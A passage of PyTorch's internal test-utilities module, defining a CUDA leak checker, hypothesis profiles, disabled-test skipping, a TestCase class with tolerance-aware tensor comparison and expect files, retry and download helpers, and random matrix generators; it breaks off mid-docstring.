        # Collect garbage first so unreachable tensors don't count as leaks.
        gc.collect()
        return tuple(torch.cuda.memory_allocated(i) for i in range(num_devices))
    def __enter__(self):
        self.befores = self.get_cuda_memory_usage()
    def __exit__(self, exec_type, exec_value, traceback):
        # Skip the leak check when the block raised -- the exception is the
        # real failure and would be masked by a leak report.
        if exec_type is not None:
            return
        afters = self.get_cuda_memory_usage()
        for i, (before, after) in enumerate(zip(self.befores, afters)):
            self.testcase.assertEqual(
                before, after, msg='{} leaked {} bytes CUDA memory on device {}'.format(
                    self.name, after - before, i))
# "min_satisfying_examples" setting has been deprecated in hypythesis
# 3.56.0 and removed in hypothesis 4.x
try:
    import hypothesis

    # Shim: drop the removed kwarg so both old and new hypothesis versions work.
    def settings(*args, **kwargs):
        if 'min_satisfying_examples' in kwargs and hypothesis.version.__version_info__ >= (3, 56, 0):
            kwargs.pop('min_satisfying_examples')
        return hypothesis.settings(*args, **kwargs)

    # Three profiles: deterministic CI, a fast dev default, and a verbose
    # high-example debug mode; the active one is chosen below.
    hypothesis.settings.register_profile(
        "pytorch_ci",
        settings(
            derandomize=True,
            suppress_health_check=[hypothesis.HealthCheck.too_slow],
            database=None,
            max_examples=100,
            verbosity=hypothesis.Verbosity.normal))
    hypothesis.settings.register_profile(
        "dev",
        settings(
            suppress_health_check=[hypothesis.HealthCheck.too_slow],
            database=None,
            max_examples=10,
            verbosity=hypothesis.Verbosity.normal))
    hypothesis.settings.register_profile(
        "debug",
        settings(
            suppress_health_check=[hypothesis.HealthCheck.too_slow],
            database=None,
            max_examples=1000,
            verbosity=hypothesis.Verbosity.verbose))
    hypothesis.settings.load_profile(
        "pytorch_ci" if IS_PYTORCH_CI else os.getenv('PYTORCH_HYPOTHESIS_PROFILE',
                                                     'dev')
    )
except ImportError:
    print('Fail to import hypothesis in common_utils, tests are not derandomized')
# Lazily populated map of disabled-test name -> tracking-issue URL.
disabled_test_from_issues = None
def check_disabled(test_name):
    """Raise unittest.SkipTest when `test_name` appears in the downloaded list
    of disabled tests (GitHub issues titled 'DISABLED <test_name>'); set
    PYTORCH_RUN_DISABLED_TESTS=1 to run such tests anyway."""
    global disabled_test_from_issues
    if disabled_test_from_issues is None:
        disabled_test_from_issues = {}
        def read_and_process():
            url = 'https://raw.githubusercontent.com/zdevito/pytorch_disabled_tests/master/result.json'
            contents = urlopen(url, timeout=1).read().decode('utf-8')
            the_response = json.loads(contents)
            for item in the_response['items']:
                title = item['title']
                key = 'DISABLED '
                if title.startswith(key):
                    test_name = title[len(key):].strip()
                    disabled_test_from_issues[test_name] = item['html_url']
        if not IS_SANDCASTLE and os.getenv("PYTORCH_RUN_DISABLED_TESTS", "0") != "1":
            try:
                read_and_process()
            except Exception:
                # Best effort: network failures leave every test enabled.
                print("Couldn't download test skip set, leaving all tests enabled...")
    if test_name in disabled_test_from_issues:
        raise unittest.SkipTest(
            "Test is disabled because an issue exists disabling it: {}".format(disabled_test_from_issues[test_name]) +
            " To enable set the environment variable PYTORCH_RUN_DISABLED_TESTS=1")
# support needed float16 comparison methods.
# TODO: Update this once bfloat16 and float16 are better supported.
def get_comparison_dtype(a, b):
    """Pick the dtype two tensors should be converted to for comparison.

    bfloat16 inputs are treated as float32 (promote_types/isclose don't
    support bfloat16 yet), and a float16 result falls back to float32 unless
    both tensors live on the same CUDA device (isclose lacks a CPU float16
    kernel).
    """
    dtype_a = torch.float32 if a.dtype is torch.bfloat16 else a.dtype
    dtype_b = torch.float32 if b.dtype is torch.bfloat16 else b.dtype
    result = torch.promote_types(dtype_a, dtype_b)
    if result is torch.float16:
        both_same_cuda = (a.device == b.device and a.device.type == 'cuda' and
                          b.device.type == 'cuda')
        if not both_same_cuda:
            result = torch.float32
    return result
class TestCase(expecttest.TestCase):
    """Base class for PyTorch tests.

    Extends expecttest.TestCase with a tensor-aware assertEqual (dense,
    sparse, quantized), per-dtype default rtol/atol, optional CUDA
    memory-leak checking and non-default-stream enforcement, disabled-test
    skipping, and expect-file support.
    """
    # NOTE: "precision" lets classes and generated tests set minimum
    # atol values when comparing tensors. Used by @precisionOverride, for
    # example.
    # TODO: provide a better mechanism for generated tests to set rtol/atol.
    _precision: float = 0
    @property
    def precision(self) -> float:
        return self._precision
    @precision.setter
    def precision(self, prec: float) -> None:
        self._precision = prec
    _do_cuda_memory_leak_check = False
    _do_cuda_non_default_stream = False
    def __init__(self, method_name='runTest'):
        super().__init__(method_name)
        test_method = getattr(self, method_name, None)
        if test_method is not None:
            # Wraps the tested method if we should do CUDA memory check.
            self._do_cuda_memory_leak_check &= getattr(test_method, '_do_cuda_memory_leak_check', True)
            # FIXME: figure out the flaky -1024 anti-leaks on windows. See #8044
            if self._do_cuda_memory_leak_check and not IS_WINDOWS:
                self.wrap_with_cuda_policy(method_name, self.assertLeaksNoCudaTensors)
            # Wraps the tested method if we should enforce non default CUDA stream.
            self._do_cuda_non_default_stream &= getattr(test_method, '_do_cuda_non_default_stream', True)
            if self._do_cuda_non_default_stream and not IS_WINDOWS and not TEST_WITH_ROCM:
                self.wrap_with_cuda_policy(method_name, self.enforceNonDefaultStream)
    def assertLeaksNoCudaTensors(self, name=None):
        name = self.id() if name is None else name
        return CudaMemoryLeakCheck(self, name)
    def enforceNonDefaultStream(self):
        return CudaNonDefaultStream()
    def wrap_with_cuda_policy(self, method_name, policy):
        test_method = getattr(self, method_name)
        # the import below may initialize CUDA context, so we do it only if
        # self._do_cuda_memory_leak_check or self._do_cuda_non_default_stream
        # is True.
        from torch.testing._internal.common_cuda import TEST_CUDA
        fullname = self.id().lower()  # class_name.method_name
        if TEST_CUDA and ('gpu' in fullname or 'cuda' in fullname):
            setattr(self, method_name, self.wrap_method_with_cuda_policy(test_method, policy))
    def wrap_method_with_cuda_policy(self, method, policy):
        # Assumes that `method` is the tested function in `self`.
        # NOTE: Python Exceptions (e.g., unittest.Skip) keeps objects in scope
        #       alive, so this cannot be done in setUp and tearDown because
        #       tearDown is run unconditionally no matter whether the test
        #       passes or not. For the same reason, we can't wrap the `method`
        @wraps(method)
        def wrapper(self, *args, **kwargs):
            with policy():
                method(*args, **kwargs)
        return types.MethodType(wrapper, self)
    def wrap_with_cuda_memory_check(self, method):
        return self.wrap_method_with_cuda_policy(method, self.assertLeaksNoCudaTensors)
    def setUp(self):
        if TEST_SKIP_FAST:
            # PYTORCH_TEST_SKIP_FAST: only tests marked @slowTest run.
            if not getattr(self, self._testMethodName).__dict__.get('slow_test', False):
                raise unittest.SkipTest("test is fast; we disabled it with PYTORCH_TEST_SKIP_FAST")
        check_disabled(str(self))
        set_rng_seed(SEED)
    def genSparseTensor(self, size, sparse_dim, nnz, is_uncoalesced, device='cpu'):
        """Build a sparse COO tensor of `size` with `nnz` random nonzeros;
        returns (tensor, indices_clone, values_clone).  When `is_uncoalesced`,
        indices are duplicated so the result is deliberately uncoalesced."""
        assert all(size[d] > 0 for d in range(sparse_dim)) or nnz == 0, 'invalid arguments'
        v_size = [nnz] + list(size[sparse_dim:])
        v = torch.randn(*v_size, device=device)
        i = torch.rand(sparse_dim, nnz, device=device)
        i.mul_(torch.tensor(size[:sparse_dim]).unsqueeze(1).to(i))
        i = i.to(torch.long)
        if is_uncoalesced:
            v = torch.cat([v, torch.randn_like(v)], 0)
            i = torch.cat([i, i], 1)
        x = torch.sparse_coo_tensor(i, v, torch.Size(size))
        if not is_uncoalesced:
            x = x.coalesce()
        else:
            x = x.detach().clone()
        return x, x._indices().clone(), x._values().clone()
    def safeToDense(self, t):
        r = self.safeCoalesce(t)
        return r.to_dense()
    def safeCoalesce(self, t):
        """Coalesce sparse tensor `t` and cross-check the result against a
        manually accumulated index->summed-value map; returns the manually
        built reference tensor."""
        tc = t.coalesce()
        self.assertEqual(tc.to_dense(), t.to_dense())
        self.assertTrue(tc.is_coalesced())
        # then it's a 0D tensor, not a 2D tensor.
        if t._nnz() == 0:
            self.assertEqual(t._indices(), tc._indices())
            self.assertEqual(t._values(), tc._values())
            return tc
        value_map = {}
        for idx, val in zip(t._indices().t(), t._values()):
            idx_tup = tuple(idx.tolist())
            if idx_tup in value_map:
                value_map[idx_tup] += val
            else:
                value_map[idx_tup] = val.clone() if isinstance(val, torch.Tensor) else val
        new_indices = sorted(list(value_map.keys()))
        new_values = [value_map[idx] for idx in new_indices]
        if t._values().ndimension() < 2:
            new_values = t._values().new(new_values)
        else:
            new_values = torch.stack(new_values)
        new_indices = t._indices().new(new_indices).t()
        tg = t.new(new_indices, new_values, t.size())
        self.assertEqual(tc._indices(), tg._indices())
        self.assertEqual(tc._values(), tg._values())
        if t.is_coalesced():
            self.assertEqual(tc._indices(), t._indices())
            self.assertEqual(tc._values(), t._values())
        return tg
    def compare_with_numpy(self, torch_fn, np_fn, tensor_like, device=None, dtype=None):
        """Assert torch_fn and np_fn agree on `tensor_like`, which may be a
        torch.Tensor or an array-like plus explicit device/dtype."""
        assert TEST_NUMPY
        assert dtype is not torch.bfloat16
        if isinstance(tensor_like, torch.Tensor):
            assert device is None
            assert dtype is None
            a = tensor_like.detach().cpu().numpy()
            t = tensor_like
        else:
            a = np.array(tensor_like, dtype=torch_to_numpy_dtype_dict[dtype])
            t = torch.tensor(tensor_like, device=device, dtype=dtype)
        np_result = np_fn(a)
        torch_result = torch_fn(t).cpu()
        if isinstance(np_result, np.ndarray):
            try:
                np_result = torch.from_numpy(np_result)
            except Exception:
                # from_numpy rejects non-writable/negative-stride arrays;
                # fall back to copying.
                np_result = torch.from_numpy(np_result.copy())
        self.assertEqual(np_result, torch_result)
    # Default (rtol, atol) per dtype; the effective tolerance is the max over
    # both operands' entries (see _getDefaultRtolAndAtol below).
    dtype_precisions = {
        torch.float16 : (0.001, 1e-5),
        torch.bfloat16 : (0.016, 1e-5),
        torch.float32 : (1.3e-6, 1e-5),
        torch.float64 : (1e-7, 1e-7),
        torch.complex32 : (0.001, 1e-5),
        torch.complex64 : (1.3e-6, 1e-5),
        torch.complex128 : (1e-7, 1e-7),
    }
    def _getDefaultRtolAndAtol(self, dtype0, dtype1):
        rtol = max(self.dtype_precisions.get(dtype0, (0, 0))[0],
                   self.dtype_precisions.get(dtype1, (0, 0))[1 - 1])
        atol = max(self.dtype_precisions.get(dtype0, (0, 0))[1],
                   self.dtype_precisions.get(dtype1, (0, 0))[1])
        return rtol, atol
    # and acquires the appropriate device, dtype, rtol and atol to compare
    # them with. It then calls _compare_tensors_internal.
    def _compareTensors(self, a, b, *, rtol: Optional[float] = None, atol=None, equal_nan=True,
                        exact_dtype=True, exact_device=False) -> _compare_return_type:
        assert (atol is None) == (rtol is None)
        if not isinstance(a, torch.Tensor):
            return (False, "argument a, {0}, to _compareTensors is not a tensor!".format(a))
        if not isinstance(b, torch.Tensor):
            return (False, "argument b, {0}, to _compareTensors is not a tensor!".format(b))
        # Validates tensors are on the same device
        if exact_device and a.device != b.device:
            return (False, ("Attempted to compare equality of tensors on "
                            "different devices! Got devices {0} and "
                            "{1}.".format(a.device, b.device)))
        # Compares tensors of different devices on the CPU
        if a.device != b.device:
            a = a.cpu()
            b = b.cpu()
        # Checks size matches
        if a.size() != b.size():
            return (False, ("Attempted to compare equality of tensors with "
                            "different sizes. Got sizes {0} and {1}.").format(a.size(), b.size()))
        # Checks dtype (if exact_dtype)
        if exact_dtype and a.dtype is not b.dtype:
            return (False, ("Attempted to compare equality of tensors with "
                            "different dtypes. Got dtypes {0} and {1}.").format(a.dtype, b.dtype))
        # Acquires rtol and atol
        if rtol is None:
            rtol, atol = self._getDefaultRtolAndAtol(a.dtype, b.dtype)
        atol = max(atol, self.precision)
        # Converts to comparison dtype
        dtype = get_comparison_dtype(a, b)
        a = a.to(dtype)
        b = b.to(dtype)
        return _compare_tensors_internal(a, b, rtol=rtol, atol=atol, equal_nan=equal_nan)
    # Checks if two scalars are equal(-ish), returning (True, None)
    # when they are and (False, debug_msg) when they are not.
    # NOTE: this function just acquires rtol and atol
    # before calling _compare_scalars_internal.
    def _compareScalars(self, a, b, *,
                        rtol: Optional[float] = None, atol: Optional[float] = None, equal_nan=True) -> _compare_return_type:
        # Acquires rtol and atol
        assert (atol is None) == (rtol is None)
        if rtol is None:
            if isinstance(a, complex) or isinstance(b, complex):
                rtol, atol = self._getDefaultRtolAndAtol(torch.complex64, torch.complex64)
            elif isinstance(a, float) or isinstance(b, float):
                rtol, atol = self._getDefaultRtolAndAtol(torch.float32, torch.float32)
            else:
                rtol, atol = 0, 0
        atol = max(atol, self.precision)
        return _compare_scalars_internal(a, b, rtol=cast(float, rtol), atol=cast(float, atol), equal_nan=equal_nan)
    def assertEqualIgnoreType(self, *args, **kwargs) -> None:
        # If you are seeing this function used, that means test is written wrongly
        # and deserves detailed investigation
        return self.assertEqual(*args, exact_dtype=False, **kwargs)
    # Compares x and y
    # TODO: default exact_device to True
    def assertEqual(self, x, y, msg: Optional[str] = None, *,
                    atol: Optional[float] = None, rtol: Optional[float] = None,
                    equal_nan=True, exact_dtype=True, exact_device=False) -> None:
        """Recursively compare x and y (tensors, scalars, strings, containers)
        with per-dtype default tolerances; atol/rtol must be given together."""
        assert (atol is None) == (rtol is None), "If one of atol or rtol is specified the other must be, too"
        # Tensor x Number and Number x Tensor comparisons
        if isinstance(x, torch.Tensor) and isinstance(y, Number):
            self.assertEqual(x.item(), y, atol=atol, rtol=rtol, msg=msg,
                             exact_dtype=exact_dtype, exact_device=exact_device)
        elif isinstance(y, torch.Tensor) and isinstance(x, Number):
            self.assertEqual(x, y.item(), atol=atol, rtol=rtol, msg=msg,
                             exact_dtype=exact_dtype, exact_device=exact_device)
        # Tensor x np.bool
        # NOTE(review): np.bool_ is referenced unconditionally here; when
        # numpy is absent (TEST_NUMPY False) this would raise NameError --
        # confirm numpy is guaranteed wherever these branches are reachable.
        elif isinstance(x, torch.Tensor) and isinstance(y, np.bool_):
            self.assertEqual(x.item(), y, atol=atol, rtol=rtol, msg=msg,
                             exact_dtype=exact_dtype, exact_device=exact_device)
        elif isinstance(y, torch.Tensor) and isinstance(x, np.bool_):
            self.assertEqual(x, y.item(), atol=atol, rtol=rtol, msg=msg,
                             exact_dtype=exact_dtype, exact_device=exact_device)
        # Tensor x Tensor
        elif isinstance(x, torch.Tensor) and isinstance(y, torch.Tensor):
            super().assertEqual(x.is_sparse, y.is_sparse, msg=msg)
            super().assertEqual(x.is_quantized, y.is_quantized, msg=msg)
            if x.is_sparse:
                x = self.safeCoalesce(x)
                y = self.safeCoalesce(y)
                indices_result, debug_msg = self._compareTensors(x._indices(), y._indices(),
                                                                 rtol=rtol, atol=atol,
                                                                 equal_nan=equal_nan, exact_dtype=exact_dtype,
                                                                 exact_device=exact_device)
                if not indices_result and msg is None:
                    assert debug_msg is not None
                    msg = "Sparse tensor indices failed to compare as equal! " + debug_msg
                self.assertTrue(indices_result, msg=msg)
                values_result, debug_msg = self._compareTensors(x._values(), y._values(),
                                                                rtol=rtol, atol=atol,
                                                                equal_nan=equal_nan, exact_dtype=exact_dtype,
                                                                exact_device=exact_device)
                if not values_result and msg is None:
                    assert debug_msg is not None
                    msg = "Sparse tensor values failed to compare as equal! " + debug_msg
                self.assertTrue(values_result, msg=msg)
            elif x.is_quantized and y.is_quantized:
                self.assertEqual(x.qscheme(), y.qscheme(), atol=atol, rtol=rtol,
                                 msg=msg, exact_dtype=exact_dtype,
                                 exact_device=exact_device)
                if x.qscheme() == torch.per_tensor_affine:
                    self.assertEqual(x.q_scale(), y.q_scale(), atol=atol, rtol=rtol,
                                     msg=msg, exact_dtype=exact_dtype,
                                     exact_device=exact_device)
                    self.assertEqual(x.q_zero_point(), y.q_zero_point(),
                                     atol=atol, rtol=rtol, msg=msg,
                                     exact_dtype=exact_dtype, exact_device=exact_device)
                elif x.qscheme() == torch.per_channel_affine:
                    self.assertEqual(x.q_per_channel_scales(), y.q_per_channel_scales(), atol=atol, rtol=rtol,
                                     msg=msg, exact_dtype=exact_dtype,
                                     exact_device=exact_device)
                    self.assertEqual(x.q_per_channel_zero_points(), y.q_per_channel_zero_points(),
                                     atol=atol, rtol=rtol, msg=msg,
                                     exact_dtype=exact_dtype, exact_device=exact_device)
                    self.assertEqual(x.q_per_channel_axis(), y.q_per_channel_axis(),
                                     atol=atol, rtol=rtol, msg=msg,
                                     exact_dtype=exact_dtype, exact_device=exact_device)
                result, debug_msg = self._compareTensors(x.int_repr().to(torch.int32),
                                                         y.int_repr().to(torch.int32),
                                                         atol=atol, rtol=rtol,
                                                         exact_dtype=exact_dtype,
                                                         exact_device=exact_device)
                if not result and msg is None:
                    assert debug_msg is not None
                    msg = "Quantized representations failed to compare as equal! " + debug_msg
                self.assertTrue(result, msg=msg)
            else:
                result, debug_msg = self._compareTensors(x, y, rtol=rtol, atol=atol,
                                                         equal_nan=equal_nan, exact_dtype=exact_dtype,
                                                         exact_device=exact_device)
                if not result and msg is None:
                    assert debug_msg is not None
                    msg = "Tensors failed to compare as equal! " + debug_msg
                self.assertTrue(result, msg=msg)
        elif isinstance(x, string_classes) and isinstance(y, string_classes):
            super().assertEqual(x, y, msg=msg)
        elif type(x) == set and type(y) == set:
            super().assertEqual(x, y, msg=msg)
        elif isinstance(x, dict) and isinstance(y, dict):
            if isinstance(x, OrderedDict) and isinstance(y, OrderedDict):
                self.assertEqual(x.items(), y.items(), atol=atol, rtol=rtol,
                                 msg=msg, exact_dtype=exact_dtype,
                                 exact_device=exact_device)
            else:
                self.assertEqual(set(x.keys()), set(y.keys()), atol=atol, rtol=rtol,
                                 msg=msg, exact_dtype=exact_dtype,
                                 exact_device=exact_device)
                key_list = list(x.keys())
                self.assertEqual([x[k] for k in key_list],
                                 [y[k] for k in key_list],
                                 atol=atol, rtol=rtol, msg=msg,
                                 exact_dtype=exact_dtype, exact_device=exact_device)
        elif isinstance(x, type) and isinstance(y, type):
            # See TestTorch.test_assert_equal_generic_meta
            super().assertEqual(x, y, msg=msg)
        elif is_iterable(x) and is_iterable(y):
            super().assertEqual(len(x), len(y), msg=msg)
            for x_, y_ in zip(x, y):
                self.assertEqual(x_, y_, atol=atol, rtol=rtol, msg=msg,
                                 exact_dtype=exact_dtype, exact_device=exact_device)
        elif isinstance(x, bool) and isinstance(y, bool):
            self.assertTrue(x == y, msg=msg)
        # Scalar x Scalar
        elif isinstance(x, Number) and isinstance(y, Number):
            result, debug_msg = self._compareScalars(x, y, rtol=rtol, atol=atol,
                                                     equal_nan=equal_nan)
            if not result and msg is None:
                assert debug_msg is not None
                msg = "Scalars failed to compare as equal! " + debug_msg
            self.assertTrue(result, msg=msg)
        else:
            super().assertEqual(x, y, msg=msg)
    def assertAlmostEqual(self, x, y, *, places=None, msg=None, delta=None):
        prec = delta
        if places:
            # Mirror unittest's places semantics: 10**-places tolerance.
            prec = 10**(-places)
        rtol = None if prec is None else 0
        self.assertEqual(x, y, msg=msg, atol=prec, rtol=rtol)
    def assertNotEqual(self, x, y, msg: Optional[str] = None, *,
                       atol: Optional[float] = None, rtol: Optional[float] = None, **kwargs) -> None:
        # Implemented by inverting assertEqual: success means assertEqual raised.
        with self.assertRaises(AssertionError, msg=msg):
            self.assertEqual(x, y, msg, atol=atol, rtol=rtol, **kwargs)
    def assertEqualTypeString(self, x, y) -> None:
        # This API is used simulate deprecated x.type() == y.type()
        self.assertEqual(x.device, y.device)
        self.assertEqual(x.dtype, y.dtype)
        self.assertEqual(x.is_sparse, y.is_sparse)
    def assertObjectIn(self, obj: Any, iterable: Iterable[Any]) -> None:
        # Identity-based membership check (`is`, not `==`).
        for elem in iterable:
            if id(obj) == id(elem):
                return
        raise AssertionError("object not found in iterable")
    # TODO: Support context manager interface
    # NB: The kwargs forwarding to callable robs the 'subname' parameter.
    # If you need it, manually apply your callable in a lambda instead.
    def assertExpectedRaises(self, exc_type, callable, *args, **kwargs):
        subname = None
        if 'subname' in kwargs:
            subname = kwargs['subname']
            del kwargs['subname']
        try:
            callable(*args, **kwargs)
        except exc_type as e:
            self.assertExpected(str(e), subname)
            return
        # Don't put this in the try block; the AssertionError will catch it
        self.fail(msg="Did not raise when expected to")
    def assertNotWarn(self, callable, msg=''):
        """Assert that invoking `callable` emits no warnings."""
        with warnings.catch_warnings(record=True) as ws:
            warnings.simplefilter("always")
            callable()
            self.assertTrue(len(ws) == 0, msg)
    @contextmanager
    def maybeWarnsRegex(self, category, regex=''):
        """Context manager: warnings matching (category, regex) are allowed;
        any other warning raised in the block fails the test."""
        with warnings.catch_warnings(record=True) as ws:
            warnings.simplefilter("always")
            warnings.filterwarnings("ignore", message=regex, category=category)
            try:
                yield
            finally:
                if len(ws) != 0:
                    msg = 'Caught unexpected warnings:\n'
                    for w in ws:
                        msg += warnings.formatwarning(
                            w.message, w.category, w.filename, w.lineno, w.line)
                        msg += '\n'
                    self.fail(msg)
    def assertExpected(self, s, subname=None):
        """Compare string `s` against the stored expect file for this test
        (test/expect/<TestClass>.<test_name>[-subname].expect); with --accept,
        create or update that file instead of failing."""
        if not isinstance(s, str):
            raise TypeError("assertExpected is strings only")
        def remove_prefix(text, prefix):
            if text.startswith(prefix):
                return text[len(prefix):]
            return text
        # PyTorch where all test scripts are in the same directory as
        # test/common_utils.py, but it matters in onnx-pytorch
        module_id = self.__class__.__module__
        munged_id = remove_prefix(self.id(), module_id + ".")
        test_file = os.path.realpath(sys.modules[module_id].__file__)
        expected_file = os.path.join(os.path.dirname(test_file),
                                     "expect",
                                     munged_id)
        subname_output = ""
        if subname:
            expected_file += "-" + subname
            subname_output = " ({})".format(subname)
        expected_file += ".expect"
        expected = None
        def accept_output(update_type):
            print("Accepting {} for {}{}:\n\n{}".format(update_type, munged_id, subname_output, s))
            with open(expected_file, 'w') as f:
                f.write(s)
        try:
            with open(expected_file) as f:
                expected = f.read()
        except IOError as e:
            if e.errno != errno.ENOENT:
                raise
            elif expecttest.ACCEPT:
                return accept_output("output")
            else:
                raise RuntimeError(
                    ("I got this output for {}{}:\n\n{}\n\n"
                     "No expect file exists; to accept the current output, run:\n"
                     "python {} {} --accept").format(munged_id, subname_output, s, __main__.__file__, munged_id))
        # a hack for JIT tests
        if IS_WINDOWS:
            expected = re.sub(r'CppOp\[(.+?)\]', 'CppOp[]', expected)
            s = re.sub(r'CppOp\[(.+?)\]', 'CppOp[]', s)
        # Adjust for producer_version
        expected = expected.replace(
            'producer_version: "XXX"',
            'producer_version: "{}"'.format(torch.onnx.producer_version)
        )
        if expecttest.ACCEPT:
            if expected != s:
                return accept_output("updated output")
        else:
            if hasattr(self, "assertMultiLineEqual"):
                # Python 2.7 only
                # NB: Python considers lhs "old" and rhs "new".
                self.assertMultiLineEqual(expected, s)
            else:
                self.assertEqual(s, expected)
    def assertExpectedStripMangled(self, s, subname=None):
        # Strip JIT name mangling ("__torch__....") before comparison.
        s = re.sub(r'__torch__[^ ]+', '', s)
        self.assertExpected(s, subname)
    # returns captured stderr
    @staticmethod
    def runWithPytorchAPIUsageStderr(code):
        """Run `code` in a fresh interpreter with API-usage logging directed
        to stderr, returning the captured stderr text."""
        import subprocess
        env = os.environ.copy()
        env["PYTORCH_API_USAGE_STDERR"] = "1"
        pipes = subprocess.Popen(
            [sys.executable, '-c', code],
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
            env=env)
        return pipes.communicate()[1].decode('ascii')
    if sys.version_info < (3, 2):
        # assertRegexpMatches renamed to assertRegex in 3.2
        assertRegex = unittest.TestCase.assertRegexpMatches
        # assertRaisesRegexp renamed to assertRaisesRegex in 3.2
        assertRaisesRegex = unittest.TestCase.assertRaisesRegexp
    if sys.version_info < (3, 5):
        # assertNotRegexpMatches renamed to assertNotRegex in 3.5
        assertNotRegex = unittest.TestCase.assertNotRegexpMatches
def download_file(url, binary=True):
    """Download ``url`` into the writable test data directory and return the path.

    The file is cached: if a file with the same basename already exists it is
    returned without re-downloading.  On a download failure the test is
    skipped (``unittest.SkipTest``) after emitting a ``RuntimeWarning``.
    """
    from urllib.parse import urlsplit
    from urllib import request, error

    target_dir = get_writable_path(os.path.join(os.path.dirname(__file__), 'data'))
    target = os.path.join(target_dir, os.path.basename(urlsplit(url)[2]))
    if os.path.exists(target):
        return target  # cache hit
    try:
        payload = request.urlopen(url, timeout=15).read()
    except error.URLError:
        msg = "could not download test file '{}'".format(url)
        warnings.warn(msg, RuntimeWarning)
        raise unittest.SkipTest(msg)
    with open(target, 'wb' if binary else 'w') as handle:
        handle.write(payload)
    return target
def find_free_port():
    """Bind an ephemeral TCP port on localhost and return its port number.

    The socket is closed before returning, so there is an inherent race:
    another process may grab the port before the caller binds it.
    ``SO_REUSEADDR`` is set so the port can be rebound immediately.
    """
    probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        probe.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        probe.bind(('localhost', 0))
        return probe.getsockname()[1]
    finally:
        probe.close()
# Errors that we can get in c10d initialization for which we should retry tests for.
ADDRESS_IN_USE = "Address already in use"
CONNECT_TIMEOUT = "connect() timed out."


def retry_on_connect_failures(func=None, connect_errors=(ADDRESS_IN_USE,)):
    """Decorator retrying ``func`` when it raises a known transient connection error.

    ``connect_errors`` is a collection of exact ``RuntimeError`` messages that
    should trigger a retry (up to 10 attempts with a short random sleep in
    between).  Any other error, or exhaustion of the retry budget, re-raises.

    Fix: the default used to be ``(ADDRESS_IN_USE)`` -- a parenthesized
    string, not a tuple -- so ``str(error) in connect_errors`` performed
    *substring* matching against "Address already in use" instead of
    membership in a collection of known messages.  The default is now a
    proper one-element tuple.
    """
    # Used with arguments, e.g. @retry_on_connect_failures(connect_errors=...):
    # return the partially-applied decorator.
    if func is None:
        return partial(retry_on_connect_failures, connect_errors=connect_errors)

    @wraps(func)
    def wrapper(*args, **kwargs):
        tries_remaining = 10
        while True:
            try:
                return func(*args, **kwargs)
            except RuntimeError as error:
                # Exact match against the known transient messages; anything
                # else is a real failure and propagates immediately.
                if str(error) in connect_errors:
                    tries_remaining -= 1
                    if tries_remaining == 0:
                        raise
                    time.sleep(random.random())
                    continue
                raise
    return wrapper
# Decorator to retry upon certain Exceptions.
def retry(ExceptionToCheck, tries=3, delay=3, skip_after_retries=False):
    """Retry decorator: re-invoke ``f`` up to ``tries`` times on ``ExceptionToCheck``.

    Sleeps ``delay`` seconds between attempts.  If every attempt fails, the
    final exception is re-raised, or -- when ``skip_after_retries`` is True --
    converted into ``unittest.SkipTest`` so the test is skipped rather than
    failed.

    Fix: the original final-attempt handler was
    ``raise unittest.SkipTest(...) from e if skip_after_retries else e``,
    which parses as ``raise SkipTest(...) from (e if ... else e)`` -- i.e. it
    raised ``SkipTest`` unconditionally and ignored ``skip_after_retries``.
    The conditional is now an explicit ``if``.
    """
    def deco_retry(f):
        @wraps(f)
        def f_retry(*args, **kwargs):
            mtries, mdelay = tries, delay
            # All but the last attempt: report, sleep and retry.
            while mtries > 1:
                try:
                    return f(*args, **kwargs)
                except ExceptionToCheck as e:
                    msg = "%s, Retrying in %d seconds..." % (str(e), mdelay)
                    print(msg)
                    time.sleep(mdelay)
                    mtries -= 1
            # Final attempt: let the exception escape, or convert to a skip.
            try:
                return f(*args, **kwargs)
            except ExceptionToCheck as e:
                if skip_after_retries:
                    raise unittest.SkipTest(f"Skipping after {tries} consecutive {str(e)}") from e
                raise
        return f_retry  # true decorator
    return deco_retry
# Methods for matrix generation
# Used in test_autograd.py and test_torch.py
def prod_single_zero(dim_size):
    """Return a random square matrix with exactly one entry forced to zero.

    Useful for exercising product gradients when a single factor vanishes.
    """
    matrix = torch.randn(dim_size, dim_size)
    matrix[0, 1] = 0
    return matrix
def random_square_matrix_of_rank(l, rank, dtype=torch.double, device='cpu'):
    """Return an ``l x l`` random matrix whose numerical rank is exactly ``rank``.

    Draws a Gaussian matrix, zeroes all but the leading ``rank`` singular
    values (bumping any exact zero among the kept ones to 1) and reassembles
    the matrix from its SVD factors.
    """
    assert rank <= l
    gaussian = torch.randn(l, l, dtype=dtype, device=device)
    u, s, v = gaussian.svd()
    s[rank:] = 0            # kill trailing singular values -> rank deficiency
    kept = s[:rank]
    kept[kept == 0] = 1     # guard against an (unlikely) exact zero
    return u.mm(torch.diag(s)).mm(v.transpose(0, 1))
def random_symmetric_matrix(l, *batches, **kwargs):
    """Return a random symmetric ``l x l`` matrix, optionally batched.

    Extra positional arguments become leading batch dimensions; ``dtype``
    and ``device`` may be passed as keyword arguments.
    """
    dtype = kwargs.get('dtype', torch.double)
    device = kwargs.get('device', 'cpu')
    mat = torch.randn(batches + (l, l), dtype=dtype, device=device)
    # Symmetrize by averaging with the (batched) transpose.
    return (mat + mat.transpose(-2, -1)).div_(2)
def random_symmetric_psd_matrix(l, *batches, **kwargs):
    """Return a random symmetric positive semi-definite matrix ``A @ A^T``."""
    dtype = kwargs.get('dtype', torch.double)
    device = kwargs.get('device', 'cpu')
    factor = torch.randn(batches + (l, l), dtype=dtype, device=device)
    # A @ A^T is symmetric PSD by construction.
    return torch.matmul(factor, factor.transpose(-2, -1))
def random_symmetric_pd_matrix(matrix_size, *batch_dims, **kwargs):
    """Return a random symmetric positive *definite* matrix.

    ``A @ A^T`` is only semi-definite, so a small multiple of the identity
    (1e-5) is added to push the spectrum strictly away from zero.
    """
    dtype = kwargs.get('dtype', torch.double)
    device = kwargs.get('device', 'cpu')
    factor = torch.randn(batch_dims + (matrix_size, matrix_size),
                         dtype=dtype, device=device)
    identity = torch.eye(matrix_size, dtype=dtype, device=device)
    return torch.matmul(factor, factor.transpose(-2, -1)) + identity * 1e-5
def make_nonzero_det(A, sign=None, min_singular_value=0.1):
    """Return a version of ``A`` whose determinant is bounded away from zero.

    Clamps the singular values of ``A`` from below at ``min_singular_value``
    and rebuilds the matrix from its SVD factors.  When ``sign`` is given,
